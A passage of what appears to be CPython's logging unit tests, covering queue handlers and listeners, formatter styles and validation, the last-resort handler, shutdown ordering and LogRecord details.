for qspec, lspec in itertools.product(qvalues, lvalues):
self.do_queuehandler_configuration(qspec, lspec)
# Some failure cases
qvalues = (None, 4, int, '', 'foo')
lvalues = (None, 4, int, '', 'bar')
for qspec, lspec in itertools.product(qvalues, lvalues):
if lspec is None and qspec is None:
continue
with self.assertRaises(ValueError) as ctx:
self.do_queuehandler_configuration(qspec, lspec)
msg = str(ctx.exception)
self.assertEqual(msg, "Unable to configure handler 'ah'")
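# ManagerTest: Manager.setLoggerClass() must reject classes that are not Logger
# subclasses and must use the registered subclass for loggers it creates;
# setLogRecordFactory() simply stores the factory on the manager.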
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
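# ChildLoggerTest: Logger.getChild('a.b') must return the very same object as
# logging.getLogger() called with the equivalent dotted name.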
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
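# DerivedLogRecord is installed via logging.setLogRecordFactory() in
# LogRecordFactoryTest, which checks that newly created records are instances
# of the registered factory class (enforced by a type-checking filter).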
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
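# QueueHandlerTest: QueueHandler prepares records (applying its formatter) and
# puts them on a queue; QueueListener then dispatches them to downstream
# handlers, optionally honouring handler levels (respect_handler_level=True).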
@threading_helper.requires_working_threading()
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
        # Test that the traceback is only appended once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
@threading_helper.requires_working_threading()
class QueueListenerTest(BaseTest):
"""
    Tests based on the patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
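# A minimal fixed-offset UTC tzinfo, used by the formatter time tests below.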
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class AssertErrorMessage:
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises((), *args, **kwargs)
except exception as e:
self.assertEqual(message, str(e))
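# FormatterTest exercises %-, {}- and $-style formatting, usesTime() detection,
# format-string validation, the 'defaults' parameter and time formatting.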
class FormatterTest(unittest.TestCase, AssertErrorMessage):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
'custom': {
'custom': 1234
}
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
        # Testing that ValueError is raised for an incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid format: invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"invalid format: bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
        # Testing failure for mismatched braces
self.assert_error_message(
ValueError,
"invalid format: expected '}' before end of string",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: Single '}' encountered in format string",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
        # Testing failure for a bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
        # Testing failure for mismatched style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_defaults_parameter(self):
fmts = ['%(custom)s %(message)s', '{custom} {message}', '$custom $message']
styles = ['%', '{', '$']
for fmt, style in zip(fmts, styles):
f = logging.Formatter(fmt, style=style, defaults={'custom': 'Default'})
r = self.get_record()
self.assertEqual(f.format(r), 'Default Message with 2 placeholders')
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
# Without default
f = logging.Formatter(fmt, style=style)
r = self.get_record()
self.assertRaises(ValueError, f.format, r)
# Non-existing default is ignored
f = logging.Formatter(fmt, style=style, defaults={'Non-existing': 'Default'})
r = self.get_record("custom")
self.assertEqual(f.format(r), '1234 Message with 2 placeholders')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
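# ExceptionTest: logging.exception(..., stack_info=True) must populate both
# exc_text (the formatted traceback) and stack_info on the emitted record.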
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
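# LastResortTest covers the handler of last resort (logging.lastResort), used
# when a logger has no handlers, and the one-shot "No handlers could be found"
# warning printed when lastResort is None.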
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
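# FakeHandler records which of acquire/flush/close/release were called on it,
# so the shutdown() tests below can assert the call order.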
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
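# RecordingHandler is a NullHandler that stores every record it handles, for
# assertions in several test cases.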
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
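# ModuleLevelMiscTest covers module-level APIs: logging.disable(), the
# module-level convenience logging functions, setLoggerClass(), behaviour at
# interpreter shutdown and getLevelNamesMapping().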
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# bpo-20037: Doing text I/O late at interpreter shutdown must not crash
code = textwrap.dedent("""
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()
""")
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_logging_at_shutdown_open(self):
# bpo-26789: FileHandler keeps a reference to the builtin open()
# function to be able to open or reopen the file during Python
# finalization.
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
code = textwrap.dedent(f"""
import builtins
import logging
class A:
def __del__(self):
logging.error("log in __del__")
# basicConfig() opens the file, but logging.shutdown() closes
# it at Python exit. When A.__del__() is called,
# FileHandler._open() must be called again to re-open the file.
logging.basicConfig(filename={filename!r}, encoding="utf-8")
a = A()
# Simulate the Python finalization which removes the builtin
# open() function.
del builtins.open
""")
assert_python_ok("-c", code)
with open(filename, encoding="utf-8") as fp:
self.assertEqual(fp.read().rstrip(), "ERROR:root:log in __del__")
def test_recursion_error(self):
# Issue 36272
code = textwrap.dedent("""
import logging
def rec():
logging.error("foo")
rec()
rec()
""")
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
def test_get_level_names_mapping(self):
mapping = logging.getLevelNamesMapping()
self.assertEqual(logging._nameToLevel, mapping) # value is equivalent
self.assertIsNot(logging._nameToLevel, mapping) # but not the internal data
new_mapping = logging.getLevelNamesMapping() # another call -> another copy
self.assertIsNot(mapping, new_mapping) # verify not the same object as before
self.assertEqual(mapping, new_mapping) # but equivalent in value
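# LogRecordTest covers LogRecord details: the str() representation, dict args,
# processName under multiprocessing, and the optional thread/process/task
# attributes controlled by the logThreads/logProcesses/logMultiprocessing/
# logAsyncioTasks flags.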
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
@staticmethod # pickled as target of child process in the following test
def _extract_logrecord_process_name(key, logMultiprocessing, conn=None):
prev_logMultiprocessing = logging.logMultiprocessing
logging.logMultiprocessing = logMultiprocessing
try:
import multiprocessing as mp
name = mp.current_process().name
